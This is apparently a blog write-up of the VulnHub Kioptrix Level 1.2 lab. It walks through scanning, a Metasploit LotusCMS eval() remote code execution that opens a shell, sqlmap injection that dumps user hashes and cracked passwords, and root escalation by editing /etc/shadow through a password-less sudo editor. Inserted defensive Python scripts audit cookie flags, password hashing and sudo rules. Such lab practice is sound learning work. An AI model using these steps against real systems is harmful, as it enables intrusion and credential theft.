
[vulnhub]Kioptrix: Level 1.2 (#3)

https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

Host discovery and port scanning

  1. Use nmap to find live hosts on the subnet

    Since the target VM was the one I added last, its IP is .169

    nmap -sP 192.168.75.0/24                
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-29 13:16 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00031s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00029s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.169
    Host is up (0.00052s latency).
    MAC Address: 00:0C:29:D1:B8:48 (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00021s latency).
    MAC Address: 00:50:56:EC:C5:A4 (VMware)
    Nmap scan report for 192.168.75.151
    
  2. Scan the host's open ports

    nmap -sT -min-rate 10000 -p- 192.168.75.169
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-29 13:16 CST
    Nmap scan report for 192.168.75.169
    Host is up (0.0010s latency).
    Not shown: 65533 closed tcp ports (conn-refused)
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    MAC Address: 00:0C:29:D1:B8:48 (VMware)
    
  3. Scan service versions and the OS version

    nmap -sV -sT -O -p22,80 192.168.75.169     
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-29 13:19 CST
    Nmap scan report for 192.168.75.169
    Host is up (0.00044s latency).
    
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
    80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
    MAC Address: 00:0C:29:D1:B8:48 (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6
    OS details: Linux 2.6.9 - 2.6.33
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
  4. Scan for vulnerabilities

    nmap -script=vuln -p22,80 192.168.75.169
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-29 13:20 CST
    Stats: 0:02:22 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
    NSE Timing: About 98.52% done; ETC: 13:22 (0:00:02 remaining)
    Stats: 0:02:53 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
    NSE Timing: About 98.52% done; ETC: 13:23 (0:00:02 remaining)
    Nmap scan report for 192.168.75.169
    Host is up (0.00027s latency).
    
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    | http-cookie-flags: 
    |   /: 
    |     PHPSESSID: 
    |_      httponly flag not set
    | http-sql-injection: 
    |   Possible sqli for queries:
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?system=Admin&page=loginSubmit%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?system=Admin&page=loginSubmit%27%20OR%20sqlspider
    |_    http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    | http-slowloris-check: 
    |   VULNERABLE:
    |   Slowloris DOS attack
    |     State: LIKELY VULNERABLE
    |     IDs:  CVE:CVE-2007-6750
    |       Slowloris tries to keep many connections to the target web server open and hold
    |       them open as long as possible.  It accomplishes this by opening connections to
    |       the target web server and sending a partial request. By doing so, it starves
    |       the http server's resources causing Denial Of Service.
    |       
    |     Disclosure date: 2009-09-17
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
    |_      http://ha.ckers.org/slowloris/
    |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
    |_http-trace: TRACE is enabled
    | http-csrf: 
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.169
    |   Found the following possible CSRF vulnerabilities: 
    |     
    |     Path: http://192.168.75.169:80/gallery/
    |     Form id: 
    |     Form action: login.php
    |     
    |     Path: http://192.168.75.169:80/index.php?system=Admin
    |     Form id: contactform
    |     Form action: index.php?system=Admin&page=loginSubmit
    |     
    |     Path: http://192.168.75.169:80/gallery/gadmin/
    |     Form id: username
    |     Form action: index.php?task=signin
    |     
    |     Path: http://192.168.75.169:80/gallery/index.php
    |     Form id: 
    |     Form action: login.php
    |     
    |     Path: http://192.168.75.169:80/index.php?system=Blog&post=1281005380
    |     Form id: commentform
    |     Form action: 
    |     
    |     Path: http://192.168.75.169:80/index.php?system=Admin&page=loginSubmit
    |     Form id: contactform
    |_    Form action: index.php?system=Admin&page=loginSubmit
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    | http-enum: 
    |   /phpmyadmin/: phpMyAdmin
    |   /cache/: Potentially interesting folder
    |   /core/: Potentially interesting folder
    |   /icons/: Potentially interesting folder w/ directory listing
    |   /modules/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
    |_  /style/: Potentially interesting folder
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    MAC Address: 00:0C:29:D1:B8:48 (VMware)
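    Two of the findings above (PHPSESSID without the httponly flag, and TRACE enabled) are cheap to verify and to fix. The following script is an added example, not part of the original write-up: it audits Set-Cookie headers for the HttpOnly, Secure and SameSite attributes and checks whether an Allow/Public header advertises TRACE. The response headers it runs on are constructed for the demonstration, not captured from the target.

```python
# Added example (not from the original write-up): offline audit of HTTP response
# headers for the cookie-flag and TRACE findings nmap's vuln scripts reported.

# Constructed sample response headers; they mimic the write-up's findings
# (a flagless PHPSESSID cookie, TRACE advertised) but were not captured from the VM.
SAMPLE_RESPONSE_HEADERS = [
    "HTTP/1.1 200 OK",
    "Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch",
    "Set-Cookie: PHPSESSID=c0nstructedsessionid; path=/",
    "Set-Cookie: theme=dark; Path=/; HttpOnly; Secure; SameSite=Lax",
    "Allow: GET,HEAD,POST,OPTIONS,TRACE",
    "Content-Type: text/html",
]

# Attributes a session cookie should carry (SameSite needs a PHP newer than 5.2).
REQUIRED_COOKIE_FLAGS = ("HttpOnly", "Secure", "SameSite")


def _header_values(headers, wanted_names):
    """Yield the value of every header whose name (case-insensitive) is in wanted_names."""
    for line in headers:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() in wanted_names:
            yield value.strip()


def audit_cookie_flags(headers):
    """Return {cookie_name: [missing flags]} for each Set-Cookie header."""
    findings = {}
    for value in _header_values(headers, {"set-cookie"}):
        parts = [p.strip() for p in value.split(";") if p.strip()]
        cookie_name = parts[0].split("=", 1)[0]
        present = {p.split("=", 1)[0].lower() for p in parts[1:]}
        findings[cookie_name] = [f for f in REQUIRED_COOKIE_FLAGS if f.lower() not in present]
    return findings


def trace_enabled(headers):
    """True when an Allow or Public header lists the TRACE method."""
    for value in _header_values(headers, {"allow", "public"}):
        if "TRACE" in {m.strip().upper() for m in value.split(",")}:
            return True
    return False


if __name__ == "__main__":
    for name, missing in audit_cookie_flags(SAMPLE_RESPONSE_HEADERS).items():
        print(f"{name}: {'OK' if not missing else 'missing ' + ', '.join(missing)}")
    print("TRACE enabled:", trace_enabled(SAMPLE_RESPONSE_HEADERS))
```

    On the fixing side, `session.cookie_httponly = 1` and `session.cookie_secure = 1` in php.ini make PHP emit the session cookie with those flags, and `TraceEnable Off` in the Apache configuration removes the TRACE method that the scan flagged.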
    

Web penetration

  1. Visit the home page


  2. Scan directories

    dirsearch -u 192.168.75.169 -x 403
    //
    [13:31:06] Starting:                                                                                                                                                                                              
    [13:31:27] 301 -  355B  - /cache  ->  http://192.168.75.169/cache/          
    [13:31:31] 301 -  354B  - /core  ->  http://192.168.75.169/core/            
    [13:31:31] 200 -  688B  - /core/fragments/moduleInfo.phtml
    [13:31:36] 200 -   23KB - /favicon.ico                                      
    [13:31:37] 301 -  357B  - /gallery  ->  http://192.168.75.169/gallery/      
    [13:31:47] 301 -  357B  - /modules  ->  http://192.168.75.169/modules/      
    [13:31:47] 200 -    2KB - /modules/                                         
    [13:31:52] 301 -  360B  - /phpmyadmin  ->  http://192.168.75.169/phpmyadmin/
    [13:31:53] 401 -  520B  - /phpmyadmin/scripts/setup.php                     
    [13:31:53] 200 -    8KB - /phpmyadmin/                                      
    [13:31:53] 200 -    8KB - /phpmyadmin/index.php                             
    [13:32:03] 301 -  355B  - /style  ->  http://192.168.75.169/style/          
    [13:32:08] 200 -   18B  - /update.php    
    
    • /modules looks like a file server
    • /phpmyadmin is phpMyAdmin
    • /update.php returns "permission denied."
    • index.php?system=Admin is the login page
  3. The login page reveals that the CMS is LotusCMS; check whether it has any exploitable vulnerabilities

    • An exploit file with a .rb suffix is listed, so search for it in msf

      # searchsploit LotusCMS    
      //
      -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
       Exploit Title                                                                                                                                                                  |  Path
      -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
      LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit)                                                                                                                   | php/remote/18565.rb
      LotusCMS 3.0.3 - Multiple Vulnerabilities                                                                                                                                       | php/webapps/16982.txt
      -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
      
    • Open the msf console and search; it should be the same module searchsploit found

      msf6 > search LotusCMS
      
      Matching Modules
      ================
      
         #  Name                              Disclosure Date  Rank       Check  Description
         -  ----                              ---------------  ----       -----  -----------
         0  exploit/multi/http/lcms_php_exec  2011-03-03       excellent  Yes    LotusCMS 3.0 eval() Remote Command Execution
      
    • Attempt exploitation

      msf6 > use exploit/multi/http/lcms_php_exec 
      msf6 exploit(multi/http/lcms_php_exec) > set rhosts 192.168.75.169
      rhosts => 192.168.75.169
      msf6 exploit(multi/http/lcms_php_exec) > set uri /index.php?system=Admin
      uri => /index.php?system=Admin
      msf6 exploit(multi/http/lcms_php_exec) > run
      [*] Started reverse TCP handler on 192.168.75.151:4444 
      [*] Using found page param: /index.php?page=index
      [*] Sending exploit ...
      [*] Exploit completed, but no session was created.
      

      It kept failing no matter what, so try a different payload

      msf6 exploit(multi/http/lcms_php_exec) > set payload php/reverse_php 
      payload => php/reverse_php
      

      After trying a few payloads, php/bind_perl turns out to work

      msf6 exploit(multi/http/lcms_php_exec) > set payload php/reverse_perl 
      payload => php/reverse_perl
      msf6 exploit(multi/http/lcms_php_exec) > run
      
      [*] Started reverse TCP handler on 192.168.75.151:4444 
      [*] Using found page param: /index.php?page=index
      [*] Sending exploit ...
      [*] Exploit completed, but no session was created.
      msf6 exploit(multi/http/lcms_php_exec) > set payload php/bind_perl
      payload => php/bind_perl
      msf6 exploit(multi/http/lcms_php_exec) > run
      
      [*] Using found page param: /index.php?page=index
      [*] Sending exploit ...
      [*] Started bind TCP handler against 192.168.75.169:4444
      [*] Command shell session 1 opened (192.168.75.151:34319 -> 192.168.75.169:4444) at 2024-10-29 14:08:36 +0800
      whoami
      www-data
      

Privilege escalation

  1. Check current privileges

    python -c "import pty;pty.spawn('/bin/sh')"
    //
    $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    //
    $ uname -a
    Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
    //
    $ whoami
    www-data
    
  2. Look for a foothold

    • Look for SUID binaries that could be used for privilege escalation

      $ find / -perm -u=s -type f 2>/dev/null
      /usr/lib/eject/dmcrypt-get-device
      /usr/lib/openssh/ssh-keysign
      /usr/lib/apache2/suexec
      /usr/lib/pt_chown
      /usr/bin/arping
      /usr/bin/mtr
      /usr/bin/newgrp
      /usr/bin/chfn
      /usr/bin/gpasswd
      /usr/bin/sudo
      /usr/bin/at
      /usr/bin/sudoedit
      /usr/bin/chsh
      /usr/bin/passwd
      /usr/bin/traceroute6.iputils
      /usr/local/bin/ht
      /usr/sbin/pppd
      /usr/sbin/uuidd
      /lib/dhcp3-client/call-dhclient-script
      /bin/fusermount
      /bin/ping
      /bin/mount
      /bin/umount
      /bin/ping6
      /bin/su
      
    • /etc/phpmyadmin/config.inc.php contains database credentials; tried them, but login failed

      // $cfg['Servers'][$i]['controluser'] = 'pma';
      // $cfg['Servers'][$i]['controlpass'] = 'pmapass';
      
    • Searching for sensitive files: /home/loneferret contains a CompanyPolicy.README file

      # CompanyPolicy.README
      Hello new employee,
      It is company policy here to use our newly installed software for editing, creating and viewing files.
      Please use the command 'sudo ht'.
      Failure to do so will result in you immediate termination.
      
      DG
      CEO
      

      But sudo ht asks for a password, so keep looking for another way

Web penetration 2

  1. Only now did I realize my target VM had a problem: visiting gallery/ loaded only partially, because the browser was automatically blocking a lot of the content.


  2. After disabling the blocking it loaded fine

  3. http://kioptrix3.com/gallery/gallery.php?id=1 looks like a possible SQL injection point; use sqlmap to test whether it is injectable

    # Result
    [19:07:04] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
    web application technology: PHP 5.2.4, Apache 2.2.8, PHP
    back-end DBMS: MySQL >= 5.0.12
    [19:07:05] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 23 times
    [19:07:05] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/kioptrix3.com'
    

    SQL injection confirmed; continue with sqlmap to dump the remaining data

    In the end two rows were dumped, corresponding to two users

    +----+---------------------------------------------+------------+
    | id | password                                    | username   |
    +----+---------------------------------------------+------------+
    | 1  | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   | dreg       |
    | 2  | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret |
    +----+---------------------------------------------+------------+
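    The dump shows why sqlmap could hand back cleartexts next to the hashes: the gallery stores unsalted MD5, so one precomputed wordlist table cracks every row at once. The script below is an added example (mine, not the write-up's or the gallery application's code). It uses the two hash values from the table above as sample input, a constructed five-word wordlist, and then shows the storage form a defender should use instead: salted PBKDF2-HMAC-SHA256 with a self-describing encoded string and constant-time verification. Function names and the `pbkdf2_sha256$iterations$salt$digest` layout are my own choices.

```python
# Added example (not from the original write-up): why unsalted MD5 is crackable
# by table lookup, and a salted PBKDF2 scheme to use instead.
import hashlib
import hmac
import os

# Hash values copied from the gallery dump in the write-up (unsalted MD5).
DUMPED_ROWS = {
    "dreg": "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
}

# Constructed mini wordlist for the demonstration; a real audit would use a full list.
WORDLIST = ["password", "123456", "starwars", "letmein", "Mast3r"]


def md5_hex(word):
    """Unsalted MD5 of a password, as the gallery application stored it."""
    return hashlib.md5(word.encode()).hexdigest()


def md5_wordlist_lookup(rows, wordlist):
    """Map each username to the wordlist entry whose MD5 equals the stored hash, or None.

    One table serves every user because the hashes are unsalted: equal passwords
    give equal hashes, so the wordlist is hashed once, not once per user.
    """
    table = {md5_hex(w): w for w in wordlist}
    return {user: table.get(digest) for user, digest in rows.items()}


def hash_password(password, salt=None, iterations=200_000):
    """Salted PBKDF2-HMAC-SHA256; the encoded string carries everything verify needs."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count, then compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print("wordlist lookup:", md5_wordlist_lookup(DUMPED_ROWS, WORDLIST))
    first, second = hash_password("starwars"), hash_password("starwars")
    print("same password, different salted hashes:", first != second)
    print("verify correct / wrong:", verify_password("starwars", first),
          verify_password("wrong", first))
```

    With the salted scheme a leaked table no longer yields passwords by lookup, each row has to be attacked separately, and the iteration count turns every guess into a deliberately slow computation.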
    
  4. Try logging in over ssh with the dumped users; loneferret logs in successfully

Privilege escalation 2

  1. Check privileges

    loneferret@Kioptrix3:~$ sudo -l
    User loneferret may run the following commands on this host:
        (root) NOPASSWD: !/usr/bin/su
        (root) NOPASSWD: /usr/local/bin/ht
    

    ht can be run with sudo; from what we found earlier, ht is a file editor, and here it runs as root without a password
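    Both lines of that sudo -l output are worth catching in an audit: a password-less rule for an editor running as root lets the user open any file, and the `!/usr/bin/su` entry is not a real deny (the sudoers manual warns that negated commands are bypassed by copying or renaming the binary). The script below is an added example, not part of the write-up: it parses sudo -l output into rules and reports both problems. The rule regex, the dict layout and the short list of editors and shells are my own assumptions.

```python
# Added example (not from the original write-up): parse "sudo -l" output and
# flag rules that defeat the point of sudo.
import re

# Copied from the sudo -l output shown above.
SUDO_L_OUTPUT = """\
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
"""

# Programs that, run as root, can open arbitrary files or drop to a shell.
# Constructed, deliberately short list; extend it for your own hosts.
EDITORS_AND_SHELLS = {"ht", "vi", "vim", "nano", "less", "more",
                      "sh", "bash", "python", "perl"}

# Matches "(runas) TAG: TAG: command" lines as printed by sudo -l.
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")


def parse_sudo_l(text):
    """Turn sudo -l output into a list of rule dicts; non-rule lines are skipped."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = set(m.group("tags").replace(":", " ").split())
        cmd = m.group("cmd")
        rules.append({
            "runas": m.group("runas").split(":")[0].strip(),  # "(root : root)" -> "root"
            "nopasswd": "NOPASSWD" in tags,
            "negated": cmd.startswith("!"),
            "cmd": cmd.lstrip("!").strip(),
        })
    return rules


def audit_rules(rules):
    """Return human-readable findings, one per problematic rule."""
    findings = []
    for r in rules:
        basename = r["cmd"].rsplit("/", 1)[-1]
        if r["negated"]:
            findings.append(
                f"'!{r['cmd']}' is not an effective deny: negated sudoers commands "
                "can be bypassed by copying or renaming the binary")
        elif r["runas"] in ("root", "ALL") and basename in EDITORS_AND_SHELLS:
            how = "without a password" if r["nopasswd"] else "with the user's own password"
            findings.append(
                f"{r['cmd']} runs as root {how} and can open any file, /etc/shadow included")
    return findings


if __name__ == "__main__":
    for finding in audit_rules(parse_sudo_l(SUDO_L_OUTPUT)):
        print("-", finding)
```

    The usual fix is to grant editing of specific files through `sudoedit` (for example `sudoedit /etc/motd`), which runs the editor unprivileged and only copies the named file back as root, rather than handing a whole editor to root.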

  2. Try modifying the shadow file

    loneferret@Kioptrix3:~$ sudo ht /etc/shadow
    Error opening terminal: xterm-256color.
    

    It errors out with "Error opening terminal: xterm-256color.", so you need to set

    export TERM=xterm
    
  3. Overwrite root's password hash with the current user's; F3 appears to be edit, F2 is save, ctrl + c quits


  4. Then log in to the root account over ssh; privilege escalation succeeded

    loneferret@Kioptrix3:~$ su root
    Password:
    root@Kioptrix3:/home/loneferret# 
    

    Read the flag file

    root@Kioptrix3:~# cat Congrats.txt 
    //
    Good for you for getting here.
    Regardless of the matter (staying within the spirit of the game of course)
    you got here, congratulations are in order. Wasn't that bad now was it.

    Went in a different direction with this VM. Exploit based challenges are
    nice. Helps workout that information gathering part, but sometimes we
    need to get our hands dirty in other things as well.
    Again, these VMs are beginner and not intented for everyone. 
    Difficulty is relative, keep that in mind.
    
    The object is to learn, do some research and have a little (legal)
    fun in the process.
    
    I hope you enjoyed this third challenge.
    
    Steven McElrea
    aka loneferret
    http://www.kioptrix.com
    
    Credit needs to be given to the creators of the gallery webapp and CMS used
    for the building of the Kioptrix VM3 site.
    
    Main page CMS: 
    http://www.lotuscms.org
    
    Gallery application: 
    Gallarific 2.1 - Free Version released October 10, 2009
    http://www.gallarific.com
    Vulnerable version of this application can be downloaded
    from the Exploit-DB website:
    http://www.exploit-db.com/exploits/15891/
    
    The HT Editor can be found here:
    http://hte.sourceforge.net/downloads.html
    And the vulnerable version on Exploit-DB here:
    http://www.exploit-db.com/exploits/17083/
    
    Also, all pictures were taken from Google Images, so being part of the
    public domain I used them.
    
    root@Kioptrix3:~# 
    
    

http://www.kler.cn/a/370719.html
